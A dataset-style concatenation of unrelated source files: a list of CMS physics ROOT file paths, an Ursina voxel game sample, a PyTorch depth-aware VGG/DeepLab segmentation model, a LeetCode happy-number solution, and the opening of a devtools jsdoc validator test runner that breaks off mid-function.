'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_88_1_9Yo.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_89_1_IL8.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_8_1_SC6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_90_1_lGk.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_91_1_XF8.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_92_1_AGd.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_93_1_xkH.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_94_1_syk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_95_1_KmM.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_96_1_hJY.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_97_1_B9n.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_98_1_8bZ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_99_1_N42.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_9_1_BCi.root']
| [
"riccardo.manzoni@cern.ch"
] | riccardo.manzoni@cern.ch |
e6c7be41238f437bec8d2fb51724a27d7b44d87d | 86834273400f125863bb0dd0e8ad22561c119ce1 | /samples/minecraft_clone.py | 18425e66eb4c3030ee769be4f2cf44a1315ac6fb | [
"MIT"
] | permissive | uditmaherwal/ursina | 9b50ae4ebf9008f086328eaeb7c79aadd3414174 | 20c6c396224f6a3b75a93a3142c0efde810fb480 | refs/heads/master | 2021-01-26T02:25:01.987909 | 2020-02-23T18:54:06 | 2020-02-23T18:54:06 | 243,273,206 | 1 | 0 | MIT | 2020-02-26T13:47:23 | 2020-02-26T13:47:22 | null | UTF-8 | Python | false | false | 834 | py | from ursina import *
from ursina.prefabs.first_person_controller import FirstPersonController
app = Ursina()
class Voxel(Button):
    """A single buildable/destructible cube in the world grid."""

    def __init__(self, position=(0,0,0)):
        # Randomize only the value channel so cubes get subtle shade variation.
        shade = color.color(0, 0, random.uniform(.9, 1.0))
        super().__init__(
            parent = scene,
            position = position,
            model = 'cube',
            origin_y = .5,
            texture = 'white_cube',
            color = shade,
            highlight_color = color.lime,
        )

    def input(self, key):
        # Only the voxel under the cursor reacts to clicks.
        if not self.hovered:
            return
        if key == 'left mouse down':
            # Place a new voxel on the clicked face (mouse.normal points out of it).
            Voxel(position=self.position + mouse.normal)
        elif key == 'right mouse down':
            destroy(self)
# Lay out an 8x8 floor of voxels at y=0.
for z in range(8):
    for x in range(8):
        voxel = Voxel(position=(x,0,z))
# Attach a first-person controller and start the engine's main loop.
player = FirstPersonController()
app.run()
| [
"pokepetter@gmail.com"
] | pokepetter@gmail.com |
0eeaba4db845cf41823269d51753df9e2692a96e | 2d3165b94a2e2da533ab0e2f2daef78a4a0c9e10 | /DCNNDemo/models-1804/VGG_Deeplab.py | ae049d49b2b757067a524396742f6445f4396ea9 | [] | no_license | shen1994/DepthAwareStereo | 51599a792077fc7673238d45f0fedabf744891af | d6c33069c80c05e6ad711682dd3b22df34fed8fe | refs/heads/main | 2023-01-08T19:11:28.881366 | 2020-10-30T02:24:29 | 2020-10-30T02:24:29 | 303,873,340 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,457 | py | import math
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
from model_utils import *
from ops.depthconv.modules import DepthConv
from ops.depthavgpooling.modules import Depthavgpooling
# Public API of this module.
# NOTE(review): only ``VGG`` is defined in this chunk; the ``vggNN``/``vggNN_bn``
# factory helpers are presumably defined further down the file — confirm before
# relying on ``__all__``.
__all__ = [
    'VGG', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',
    'vgg19_bn', 'vgg19',
]

# Download URLs of the torchvision-pretrained VGG weights (loadable through
# torch.utils.model_zoo, imported above).
model_urls = {
    'vgg11': 'https://download.pytorch.org/models/vgg11-bbd30ac9.pth',
    'vgg13': 'https://download.pytorch.org/models/vgg13-c768596a.pth',
    'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',
    'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',
    'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',
    'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',
    'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',
    'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',
}

# Channel plan of the VGG-16 ('D') configuration; 'M' marks a max-pool.
cfg = {
    # name:c1_1 c1_2 c2_1 c2_2 c3_1 c3_2 c3_3 c4_1 c4_2 c4_3 c5_1 c5_2 c5_3
    # dilation: 2 2 2
    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
}
# NOTE(review): not referenced anywhere in this chunk; presumably indices of
# the layers that become depth-aware — confirm against the rest of the file.
depth_cfg = {
    'D': [0,3,6,10,14],
}
class ConvModule(nn.Module):
    """One VGG-style unit: Conv2d -> (optional BatchNorm) -> ReLU -> (optional MaxPool).

    All stages live in a single ``nn.Sequential`` stored as ``self.layers``,
    so state_dict keys are ``layers.0`` (conv), then bn/relu/pool in order.
    """

    def __init__(self, inplanes, planes, kernel_size=3, stride=1, padding=1, dilation=1,
                 bn=False,
                 maxpool=False, pool_kernel=3, pool_stride=2, pool_pad=1):
        super(ConvModule, self).__init__()
        stages = [nn.Conv2d(inplanes, planes, kernel_size=kernel_size, stride=stride,
                            padding=padding, dilation=dilation)]
        if bn:
            stages.append(nn.BatchNorm2d(planes))
        stages.append(nn.ReLU(inplace=True))
        if maxpool:
            stages.append(nn.MaxPool2d(kernel_size=pool_kernel, stride=pool_stride,
                                       padding=pool_pad))
        self.layers = nn.Sequential(*stages)

    def forward(self, x):
        """Run the conv/bn/relu(/pool) pipeline on a (N, C, H, W) tensor."""
        return self.layers(x)
class DepthConvModule(nn.Module):
    """Depth-aware unit: DepthConv -> (optional BatchNorm) -> ReLU.

    Only the leading DepthConv consumes the depth map; the remaining stages
    are ordinary single-input modules.
    """

    def __init__(self, inplanes, planes, kernel_size=3, stride=1, padding=1, dilation=1, bn=False):
        super(DepthConvModule, self).__init__()
        stages = [DepthConv(inplanes, planes, kernel_size=kernel_size, stride=stride,
                            padding=padding, dilation=dilation)]
        if bn:
            stages.append(nn.BatchNorm2d(planes))
        stages.append(nn.ReLU(inplace=True))
        self.layers = nn.Sequential(*stages)

    def forward(self, x, depth):
        """Apply DepthConv with ``depth`` guidance, then the remaining stages."""
        modules = list(self.layers)
        x = modules[0](x, depth)
        for module in modules[1:]:
            x = module(x)
        return x
class VGG_layer2(nn.Module):
    """VGG-16 backbone for DeepLab where depth-aware conv (when ``depthconv``)
    is applied only at conv4_1 and conv5_1.

    Stages 4/5 keep spatial resolution (stride-1 pools) and conv5 uses
    dilation=2, DeepLab-style. ``forward`` returns ``(features, depth)`` with
    the depth map average-pooled down to the feature resolution.
    """

    def __init__(self, batch_norm=False, depthconv=False):
        super(VGG_layer2, self).__init__()
        self.depthconv = depthconv
        self.conv1_1 = ConvModule(3, 64, bn=batch_norm)
        self.conv1_2 = ConvModule(64, 64, bn=batch_norm, maxpool=True)
        # Depth is pooled alongside the features so its resolution tracks them.
        self.downsample_depth2_1 = nn.AvgPool2d(3,padding=1,stride=2)
        self.conv2_1 = ConvModule(64, 128, bn=batch_norm)
        self.conv2_2 = ConvModule(128, 128, bn=batch_norm, maxpool=True)
        self.downsample_depth3_1 = nn.AvgPool2d(3,padding=1,stride=2)
        self.conv3_1 = ConvModule(128, 256, bn=batch_norm)
        self.conv3_2 = ConvModule(256, 256, bn=batch_norm)
        self.conv3_3 = ConvModule(256, 256, bn=batch_norm, maxpool=True)
        if self.depthconv:
            # Fixed scalar weight on the depth input (a learnable Parameter was
            # tried and left commented out).
            self.conv4_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.downsample_depth4_1 = nn.AvgPool2d(3,padding=1,stride=2)
            self.conv4_1 = DepthConvModule(256, 512, bn=batch_norm)
        else:
            self.conv4_1 = ConvModule(256, 512, bn=batch_norm)
        self.conv4_2 = ConvModule(512, 512, bn=batch_norm)
        # Stride-1 pool: resolution is preserved from here on.
        self.conv4_3 = ConvModule(512, 512, bn=batch_norm,
                                  maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
        if self.depthconv:
            self.conv5_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.conv5_1 = DepthConvModule(512, 512, bn=batch_norm,dilation=2,padding=2)
        else:
            self.conv5_1 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
        self.conv5_2 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
        self.conv5_3 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2,
                                  maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
        self.pool5a = nn.AvgPool2d(kernel_size=3, stride=1,padding=1)

    def forward(self, x, depth=None):
        # NOTE(review): depth is pooled unconditionally below, so despite the
        # ``depth=None`` default this forward crashes without a depth map —
        # confirm all callers pass one.
        x = self.conv1_1(x)
        x = self.conv1_2(x)
        depth = self.downsample_depth2_1(depth)
        x = self.conv2_1(x)
        x = self.conv2_2(x)
        depth = self.downsample_depth3_1(depth)
        x = self.conv3_1(x)
        x = self.conv3_2(x)
        x = self.conv3_3(x)
        if self.depthconv:
            depth = self.downsample_depth4_1(depth)
            x = self.conv4_1(x, self.conv4_1_depthconvweight * depth)
        else:
            x = self.conv4_1(x)
        x = self.conv4_2(x)
        x = self.conv4_3(x)
        if self.depthconv:
            x = self.conv5_1(x, self.conv5_1_depthconvweight * depth)
        else:
            x = self.conv5_1(x)
        x = self.conv5_2(x)
        x = self.conv5_3(x)
        x = self.pool5a(x)
        return x, depth
class VGG_layer(nn.Module):
    """VGG-16 backbone for DeepLab where, when ``depthconv`` is set, the first
    conv of every stage (conv1_1..conv5_1) is depth-aware and the final pool is
    a depth-weighted average pool.

    Conv5 is dilated (dilation=2) and stages 4/5 use stride-1 pools, so the
    output stride is set by the three stride-2 pools in stages 1-3.
    ``forward`` returns ``(features, depth)``.
    """

    def __init__(self, batch_norm=False, depthconv=False):
        super(VGG_layer, self).__init__()
        self.depthconv = depthconv
        if self.depthconv:
            # Fixed scalar weight on the depth input (a learnable Parameter was
            # tried and left commented out).
            self.conv1_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.conv1_1 = DepthConvModule(3, 64, bn=batch_norm)
        else:
            self.conv1_1 = ConvModule(3, 64, bn=batch_norm)
        self.conv1_2 = ConvModule(64, 64, bn=batch_norm, maxpool=True)
        if self.depthconv:
            self.conv2_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            # Depth is pooled alongside the features so its resolution tracks them.
            self.downsample_depth2_1 = nn.AvgPool2d(3,padding=1,stride=2)
            self.conv2_1 = DepthConvModule(64, 128, bn=batch_norm)
        else:
            self.conv2_1 = ConvModule(64, 128, bn=batch_norm)
        self.conv2_2 = ConvModule(128, 128, bn=batch_norm, maxpool=True)
        if self.depthconv:
            self.conv3_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.downsample_depth3_1 = nn.AvgPool2d(3,padding=1,stride=2)
            self.conv3_1 = DepthConvModule(128, 256, bn=batch_norm)
        else:
            self.conv3_1 = ConvModule(128, 256, bn=batch_norm)
        self.conv3_2 = ConvModule(256, 256, bn=batch_norm)
        self.conv3_3 = ConvModule(256, 256, bn=batch_norm, maxpool=True)
        if self.depthconv:
            self.conv4_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.downsample_depth4_1 = nn.AvgPool2d(3,padding=1,stride=2)
            self.conv4_1 = DepthConvModule(256, 512, bn=batch_norm)
        else:
            self.conv4_1 = ConvModule(256, 512, bn=batch_norm)
        self.conv4_2 = ConvModule(512, 512, bn=batch_norm)
        # Stride-1 pool: resolution is preserved from here on.
        self.conv4_3 = ConvModule(512, 512, bn=batch_norm,
                                  maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
        if self.depthconv:
            self.conv5_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.conv5_1 = DepthConvModule(512, 512, bn=batch_norm,dilation=2,padding=2)
        else:
            self.conv5_1 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
        self.conv5_2 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
        self.conv5_3 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2,
                                  maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
        # Plain average pool vs. depth-weighted pool; forward picks one.
        self.pool5a = nn.AvgPool2d(kernel_size=3, stride=1,padding=1)
        self.pool5a_d = Depthavgpooling(kernel_size=3, stride=1,padding=1)

    def forward(self, x, depth=None):
        # depth is only touched inside ``if self.depthconv`` branches, so
        # depth=None is safe when depthconv is disabled.
        if self.depthconv:
            x = self.conv1_1(x,self.conv1_1_depthconvweight * depth)
        else:
            x = self.conv1_1(x)
        x = self.conv1_2(x)
        if self.depthconv:
            depth = self.downsample_depth2_1(depth)
            x = self.conv2_1(x, self.conv2_1_depthconvweight * depth)
        else:
            x = self.conv2_1(x)
        x = self.conv2_2(x)
        if self.depthconv:
            depth = self.downsample_depth3_1(depth)
            x = self.conv3_1(x, self.conv3_1_depthconvweight * depth)
        else:
            x = self.conv3_1(x)
        x = self.conv3_2(x)
        x = self.conv3_3(x)
        if self.depthconv:
            depth = self.downsample_depth4_1(depth)
            x = self.conv4_1(x, self.conv4_1_depthconvweight * depth)
        else:
            x = self.conv4_1(x)
        x = self.conv4_2(x)
        x = self.conv4_3(x)
        if self.depthconv:
            x = self.conv5_1(x, self.conv5_1_depthconvweight * depth)
        else:
            x = self.conv5_1(x)
        x = self.conv5_2(x)
        x = self.conv5_3(x)
        if self.depthconv:
            x = self.pool5a_d(x,depth)
        else:
            x = self.pool5a(x)
        return x, depth
class Classifier_Module(nn.Module):
    """DeepLab ASPP classification head.

    Four parallel fc6->fc7->fc8 branches with dilations/paddings 6, 12, 18, 24;
    their per-class score maps are summed. When ``depthconv`` is set, each fc6
    becomes a DepthConv guided by the depth map.
    """

    def __init__(self, num_classes, inplanes, depthconv=False):
        super(Classifier_Module, self).__init__()
        # [6, 12, 18, 24]
        self.depthconv = depthconv
        # --- branch 1: dilation 6 ---
        if depthconv:
            self.fc6_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.fc6_1 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=6, dilation=6) # fc6
        else:
            self.fc6_1 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=6, dilation=6) # fc6
        self.fc7_1 = nn.Sequential(
            *[nn.ReLU(True), nn.Dropout(),
              nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
        self.fc8_1 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
        # --- branch 2: dilation 12 ---
        if depthconv:
            self.fc6_2_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.fc6_2 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12) # fc6
        else:
            self.fc6_2 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12) # fc6
        self.fc7_2 = nn.Sequential(
            *[nn.ReLU(True), nn.Dropout(),
              nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
        self.fc8_2 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
        # --- branch 3: dilation 18 ---
        if depthconv:
            self.fc6_3_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.fc6_3 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=18, dilation=18) # fc6
        else:
            self.fc6_3 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=18, dilation=18) # fc6
        self.fc7_3 = nn.Sequential(
            *[nn.ReLU(True), nn.Dropout(),
              nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
        self.fc8_3 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
        # --- branch 4: dilation 24 ---
        if depthconv:
            self.fc6_4_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.fc6_4 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=24, dilation=24) # fc6
        else:
            self.fc6_4 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=24, dilation=24) # fc6
        self.fc7_4 = nn.Sequential(
            *[nn.ReLU(True), nn.Dropout(),
              nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
        self.fc8_4 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8

    def forward(self, x, depth=None):
        # Each branch produces (N, num_classes, H, W) logits; the sum fuses them.
        if self.depthconv:
            out1 = self.fc6_1(x, self.fc6_1_depthconvweight * depth)
        else:
            out1 = self.fc6_1(x)
        out1 = self.fc7_1(out1)
        out1 = self.fc8_1(out1)
        if self.depthconv:
            out2 = self.fc6_2(x, self.fc6_2_depthconvweight * depth)
        else:
            out2 = self.fc6_2(x)
        out2 = self.fc7_2(out2)
        out2 = self.fc8_2(out2)
        if self.depthconv:
            out3 = self.fc6_3(x, self.fc6_3_depthconvweight * depth)
        else:
            out3 = self.fc6_3(x)
        out3 = self.fc7_3(out3)
        out3 = self.fc8_3(out3)
        if self.depthconv:
            out4 = self.fc6_4(x, self.fc6_4_depthconvweight * depth)
        else:
            out4 = self.fc6_4(x)
        out4 = self.fc7_4(out4)
        out4 = self.fc8_4(out4)
        return out1+out2+out3+out4
class Classifier_Module2(nn.Module):
    """Single-branch DeepLab head (dilation 12) with a global-context feature.

    fc6->fc7 produces 1024 channels; a global average-pooled copy is upsampled
    back to the feature size and concatenated (-> 2048 channels) before the
    1x1 fc8 classifier. With ``depthconv``, fc6 is a depth-guided DepthConv.
    """

    def __init__(self, num_classes, inplanes, depthconv=False):
        super(Classifier_Module2, self).__init__()
        # [6, 12, 18, 24]
        self.depthconv = depthconv
        if depthconv:
            self.fc6_2_depthconvweight = 1.#nn.Parameter(torch.ones(1))
            self.fc6_2 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12)
            self.downsample_depth = None
        else:
            # NOTE(review): defined but never used in forward — confirm whether
            # an external caller relies on it.
            self.downsample_depth = nn.AvgPool2d(9,padding=1,stride=8)
            self.fc6_2 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12) # fc6
        self.fc7_2 = nn.Sequential(
            *[nn.ReLU(True), nn.Dropout(),
              nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
        # self.globalpooling = DepthGlobalPool(1024,3)#
        # self.fc8_2 = nn.Conv2d(1024+3, num_classes, kernel_size=1, stride=1, bias=True) # fc8
        self.globalpooling = nn.AdaptiveAvgPool2d((1, 1))#nn.AvgPool2d((54,71))#
        self.dropout = nn.Dropout(0.3)
        # self.norm = CaffeNormalize(1024)#LayerNorm(1024)#nn.InstanceNorm2d(1024).use_running_stats(mode=False)
        self.fc8_2 = nn.Conv2d(2048, num_classes, kernel_size=1, stride=1, bias=True) # fc8

    def forward(self, x, depth=None):
        if self.depthconv:
            out2 = self.fc6_2(x, self.fc6_2_depthconvweight * depth)
        else:
            out2 = self.fc6_2(x)
        out2 = self.fc7_2(out2)
        out2_size = out2.size()
        # Global context: pool to 1x1, dropout, then bilinearly upsample back
        # to the spatial size of out2 so it can be concatenated channel-wise.
        globalpool = self.globalpooling(out2)
        globalpool = self.dropout(globalpool)#self.norm(globalpool))
        upsample = nn.Upsample((out2_size[2],out2_size[3]), mode='bilinear', align_corners=True)#scale_factor=8)
        globalpool = upsample(globalpool)
        out2 = torch.cat([out2, globalpool], 1)
        out2 = self.fc8_2(out2)
        return out2
class VGG(nn.Module):
    """VGG-16 backbone (optionally depth-aware) with a Classifier_Module2 head.

    The ``get_*_lr_params`` generators partition parameters into groups that
    the training script assigns different learning-rate multipliers to
    (1x/2x for backbone weights/biases, 10x/20x for the classifier, 100x for
    the scalar depth-conv mixing weights).
    """

    def __init__(self, num_classes=20, init_weights=True, depthconv=False, bn=False):
        super(VGG, self).__init__()
        self.features = VGG_layer(batch_norm=bn, depthconv=depthconv)
        self.classifier = Classifier_Module2(num_classes, 512, depthconv=depthconv)
        if init_weights:
            self._initialize_weights()

    def forward(self, x, depth=None):
        x, depth = self.features(x, depth)
        x = self.classifier(x, depth)
        return x

    def _initialize_weights(self):
        """He-style init for convs, unit/zero BatchNorm, N(0, 0.01) linears."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
                if m.bias is not None:
                    m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                m.weight.data.normal_(0, 0.01)
                m.bias.data.zero_()

    def _backbone_modules(self):
        """Shared module list for the 1x/2x learning-rate groups.

        Factored out so the weight and bias generators cannot drift apart
        (they previously duplicated this list by hand).
        """
        f, c = self.features, self.classifier
        return [f.conv1_1, f.conv1_2,
                f.conv2_1, f.conv2_2,
                f.conv3_1, f.conv3_2, f.conv3_3,
                f.conv4_1, f.conv4_2, f.conv4_3,
                f.conv5_1, f.conv5_2, f.conv5_3,
                c.fc6_2, c.fc7_2]

    def get_normalize_params(self):
        # NOTE(review): Classifier_Module2 currently leaves ``norm`` commented
        # out, so this would raise AttributeError if called -- confirm before use.
        b = []
        b.append(self.classifier.norm)
        for i in b:
            if isinstance(i, CaffeNormalize):
                yield i.scale

    def get_1x_lr_params_NOscale(self):
        """Yield trainable conv/DepthConv *weights* of the backbone + fc6/fc7."""
        for module in self._backbone_modules():
            for layer in module.modules():
                if isinstance(layer, (nn.Conv2d, DepthConv)):
                    if layer.weight.requires_grad:
                        yield layer.weight

    def get_2x_lr_params_NOscale(self):
        """Yield trainable conv/DepthConv *biases* of the backbone + fc6/fc7."""
        for module in self._backbone_modules():
            for layer in module.modules():
                if isinstance(layer, (nn.Conv2d, DepthConv)):
                    if layer.bias is not None and layer.bias.requires_grad:
                        yield layer.bias

    def get_10x_lr_params(self):
        """Yield the classifier (fc8) weight."""
        yield self.classifier.fc8_2.weight

    def get_20x_lr_params(self):
        """Yield the classifier (fc8) bias."""
        yield self.classifier.fc8_2.bias

    def get_100x_lr_params(self):
        """Yield the scalar depth-conv mixing weights.

        Only meaningful with ``depthconv=True``.
        NOTE(review): Classifier_Module2 defines only ``fc6_2_depthconvweight``;
        the fc6_1/fc6_3/fc6_4 entries look left over from the four-branch
        Classifier_Module and would raise AttributeError here -- confirm.
        """
        b = []
        b.append(self.features.conv1_1_depthconvweight)
        b.append(self.features.conv2_1_depthconvweight)
        b.append(self.features.conv3_1_depthconvweight)
        b.append(self.features.conv4_1_depthconvweight)
        b.append(self.features.conv5_1_depthconvweight)
        b.append(self.classifier.fc6_1_depthconvweight)
        b.append(self.classifier.fc6_2_depthconvweight)
        b.append(self.classifier.fc6_3_depthconvweight)
        b.append(self.classifier.fc6_4_depthconvweight)
        for j in range(len(b)):
            yield b[j]
def vgg16(pretrained=False, **kwargs):
    """Build a VGG 16-layer model (configuration "D") without batch norm.

    Args:
        pretrained (bool): when True, skip random init and load ImageNet weights.
        **kwargs: forwarded to the ``VGG`` constructor.
    """
    if pretrained:
        # Pretrained weights overwrite everything, so random init is wasted work.
        kwargs['init_weights'] = False
        net = VGG(bn=False, **kwargs)
        net.load_state_dict(model_zoo.load_url(model_urls['vgg16']))
    else:
        net = VGG(bn=False, **kwargs)
    return net
def vgg16_bn(pretrained=False, **kwargs):
    """Build a VGG 16-layer model (configuration "D") with batch normalization.

    Args:
        pretrained (bool): when True, skip random init and load ImageNet weights.
        **kwargs: forwarded to the ``VGG`` constructor.
    """
    if pretrained:
        # Pretrained weights overwrite everything, so random init is wasted work.
        kwargs['init_weights'] = False
        net = VGG(bn=True, **kwargs)
        net.load_state_dict(model_zoo.load_url(model_urls['vgg16_bn']))
    else:
        net = VGG(bn=True, **kwargs)
    return net
| [
"you@example.com"
] | you@example.com |
6044707a842d423d814ff79bbe88165aa85c6a63 | 036a41c913b3a4e7ae265e22a672dd89302d3200 | /0201-0300/0202/0202_Python_1.py | 824b7df04f6dc998ee5063168448cdd780ec660e | [] | no_license | ChangxingJiang/LeetCode | e76f96ebda68d7ade53575354479cfc33ad4f627 | a2209206cdd7229dd33e416f611e71a984a8dd9e | refs/heads/master | 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | class Solution:
def isHappy(self, n: int) -> bool:
already = set()
while n != 1:
if n in already:
return False
already.add(n)
n = sum([int(x) * int(x) for x in str(n)])
return True
# Manual smoke test: 19 is a happy number (19 -> 82 -> 68 -> 100 -> 1).
if __name__ == "__main__":
    print(Solution().isHappy(19)) # True
| [
"1278729001@qq.com"
] | 1278729001@qq.com |
fe3a796bb288f2ea2a15f6a1831131ee1055515f | 641fa8341d8c436ad24945bcbf8e7d7d1dd7dbb2 | /third_party/WebKit/Source/devtools/scripts/jsdoc_validator/run_tests.py | c2625381bf84c0386fa8f16a076d312a87ec7283 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | massnetwork/mass-browser | 7de0dfc541cbac00ffa7308541394bac1e945b76 | 67526da9358734698c067b7775be491423884339 | refs/heads/master | 2022-12-07T09:01:31.027715 | 2017-01-19T14:29:18 | 2017-01-19T14:29:18 | 73,799,690 | 4 | 4 | BSD-3-Clause | 2022-11-26T11:53:23 | 2016-11-15T09:49:29 | null | UTF-8 | Python | false | false | 2,142 | py | #!/usr/bin/python
import hashlib
import operator
import os
import shutil
import stat
import subprocess
import sys
import tempfile
def rel_to_abs(rel_path):
    """Join rel_path onto this script's directory.

    Relies on the module-level ``script_path`` assigned a few lines below;
    the first call happens after that assignment, so this is safe.
    """
    return os.path.join(script_path, rel_path)
# Java invocation tuned for the validator: larger initial heap, server JIT.
java_exec = 'java -Xms1024m -server -XX:+TieredCompilation'
tests_dir = 'tests'
jar_name = 'jsdoc_validator.jar'
# All paths are resolved relative to this script's own directory.
script_path = os.path.dirname(os.path.abspath(__file__))
tests_path = rel_to_abs(tests_dir)
validator_jar_file = rel_to_abs(jar_name)
golden_file = os.path.join(tests_path, 'golden.dat')
# Every .js file directly inside tests/ is fed to the validator.
test_files = [os.path.join(tests_path, f) for f in os.listdir(tests_path) if f.endswith('.js') and os.path.isfile(os.path.join(tests_path, f))]
# Sorted so the validator output (and thus the golden file) is stable.
validator_command = "%s -jar %s %s" % (java_exec, validator_jar_file, " ".join(sorted(test_files)))
def run_and_communicate(command, error_template):
